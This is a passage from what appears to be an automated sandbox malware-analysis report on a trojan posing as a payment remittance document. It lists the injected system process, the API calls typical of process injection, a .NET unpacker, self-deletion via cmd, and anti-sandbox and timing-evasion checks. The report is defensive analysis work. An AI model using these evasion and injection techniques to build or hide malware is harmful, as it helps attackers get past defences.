          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04799B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_007185E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00718690 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00718710 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_007187C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071868A NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071870A NtClose,
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeBinary or memory string: OriginalFilename vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.225335486.00000000003C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSerializationHeaderReco.exe8 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.225993143.0000000000BBB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeBinary or memory string: OriginalFilename vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302006215.0000000000F94000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.303502359.000000000163F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301350548.00000000008A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSerializationHeaderReco.exe8 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeBinary or memory string: OriginalFilenameSerializationHeaderReco.exe8 vs Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeVirustotal: Detection: 28%
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeReversingLabs: Detection: 57%
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeFile read: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe:Zone.IdentifierJump to behavior
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@11/4
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1392:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe, 00000013.00000002.477861762.000000000484F000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe
          Source: Binary string: RAServer.pdbGCTL source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\HJmNUXoTNN\src\obj\Debug\SerializationHeaderReco.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.3c0000.0.unpack, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.0.unpack, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.8a0000.1.unpack, ConsoleGame/Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00418AC2 push ecx; ret
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00415B75 push ds; ret
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_0041B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071B822 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071B82B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071B88C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00718AC2 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_00715B75 push ds; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0071B7D5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.48050578829
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeFile created: \electronic payment remittance document 09.13.21 vrf 65665011119889.exe
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeFile created: \electronic payment remittance document 09.13.21 vrf 65665011119889.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe PID: 3176, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000708604 second address: 000000000070860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 000000000070899E second address: 00000000007089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239859s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239749s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239640s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239531s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239422s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239311s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239202s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -239063s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238953s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238781s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238656s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238531s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238422s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238309s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238156s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -238046s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237921s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237812s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237687s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237578s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237469s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237344s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237203s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -237047s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236921s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236797s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236672s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236547s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236422s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236297s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236172s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -236063s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235906s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235797s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235672s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235563s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235407s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235296s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235172s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -235047s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234906s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234765s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234655s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234547s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234437s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234328s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234219s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -234047s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233922s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 3340Thread sleep time: -233796s >= -30000s
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe TID: 1364Thread sleep time: -43239s >= -30000s
